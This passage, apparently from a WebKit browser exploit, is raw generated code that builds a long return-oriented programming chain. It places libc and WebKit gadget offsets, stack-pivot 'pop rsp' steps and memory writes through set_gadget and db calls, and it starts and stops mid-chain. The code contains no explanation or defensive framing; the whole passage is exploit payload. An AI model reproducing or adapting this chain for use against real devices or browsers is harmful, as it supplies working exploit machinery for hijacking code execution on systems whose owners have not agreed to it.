set_gadget(webkit_base+3236123,); //pop r9 //L1901: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1902: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+139504, //L1903 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+139536, //L1905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+139520, //L1904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1903: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1904: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1905: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+139640, //L1906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+139656, //L1907 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1906: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1907: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+139776, //L1908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+139760, //L1909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1909: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1908: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+141248, //L1910 //L1848: libc_base+764760, //pop rsi ropchain+139840, //L1911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1911: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1913: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+139960, //L1916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+139944, //L1914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1914: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1916: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+140104, //L1919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+140072, //L1917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+140088, //L1918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1917: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1918: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1919: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+140184, //L1920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1920: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1922: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+140304, //L1925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+140288, //L1923 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1923: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1925: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+140480, //L1928 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+140496, //L1929 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+140448, //L1926 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+140464, //L1927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1926: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1927: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1928: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1929: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+140592, //L1931 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+140576, //L1930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1930: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1931: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L1933: ropchain+140696, //L1932 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+141576, //L1934 //L1932: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+140840, //L1936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+140856, //L1937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+140824, //L1935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1935: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1936: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1937: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+140968, //L1938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+141000, //L1940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+140984, //L1939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1938: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1939: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1940: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+141104, //L1941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+141120, //L1942 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1941: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1942: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+141240, //L1943 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+141224, //L1944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1944: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1943: db([0, 0]); // 0x0 //L1910: set_gadgets([ libc_base+764760, //pop rsi ropchain+141328, //L1946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+141312, //L1945 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1945: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1946: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+141432, //L1947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+141448, //L1948 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1947: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1948: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+141568, //L1949 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+141552, //L1950 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1950: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1949: db([0, 0]); // 0x0 //L1934: set_gadget(libc_base+764760,); //pop rsi db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+1438842, //pop rdx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+3236123, //pop r9 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+756281, //xor rax, rax libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+782311, //pop rsp libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967080, 4294967295]); // -0xd8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([200, 0]); // 0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967088, 4294967295]); // -0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([192, 0]); // 0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967096, 4294967295]); // -0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([184, 0]); // 0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967104, 4294967295]); // -0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([176, 0]); // 0xb0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967112, 4294967295]); // -0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([168, 0]); // 0xa8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ webkit_base+14664103, //and rax, rcx libc_base+763368, //pop rcx __swbuf_addr, webkit_base+20307877, //mov [rax], rcx libc_base+764760 //pop rsi ]); db([4294967192, 4294967295]); // -0x68 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([48, 0]); // 0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([32, 0]); // 0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([24, 0]); // 0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([128, 0]); // 0x80 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+142896, //L1951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+782311 //pop rsp ]); //L1951: db([0, 0]); // 0x0 //___bswap64_var: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+142968, //L1953 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L1953: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+143064, //L1954 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+143096, //L1957 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L1954: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1956: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L1957: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+143200, //L1960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+143184, //L1958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1958: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1960: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+143312, //L1961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+143344, //L1963 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+143328, //L1962 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1961: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1962: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1963: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+143448, //L1964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+143464, //L1965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1964: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1965: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+143584, //L1966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+143568, //L1967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1967: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1966: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+143672, //L1969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+143656, //L1968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1968: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1969: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+143776, //L1970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+143792, //L1971 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1970: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1971: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+143912, //L1972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+143896, //L1973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1973: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1972: db([0, 0]); // 0x0 //___bswap32_var: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+143984, //L1975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L1975: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+144080, //L1976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+144112, //L1979 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L1976: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1978: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L1979: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+144216, //L1982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+144200, //L1980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1980: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1982: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+144392, //L1985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+144408, //L1986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+144360, //L1983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+144376, //L1984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1983: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1984: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1985: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1986: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+144568, //L1990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+144536, //L1988 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+144552, //L1989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1987: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L1988: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1989: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1990: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+144688, //L1991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+144720, //L1993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+144704, //L1992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1991: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1992: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1993: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+144824, //L1994 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+144840, //L1995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1994: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1995: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+144960, //L1996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+144944, //L1997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1997: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1996: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+145048, //L1999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+145032, //L1998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1998: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1999: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+145152, //L2000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+145168, //L2001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2000: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2001: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+145288, //L2002 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+145272, //L2003 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2003: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2002: db([0, 0]); // 0x0 //___bswap16_var: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+145360, //L2005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2005: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, 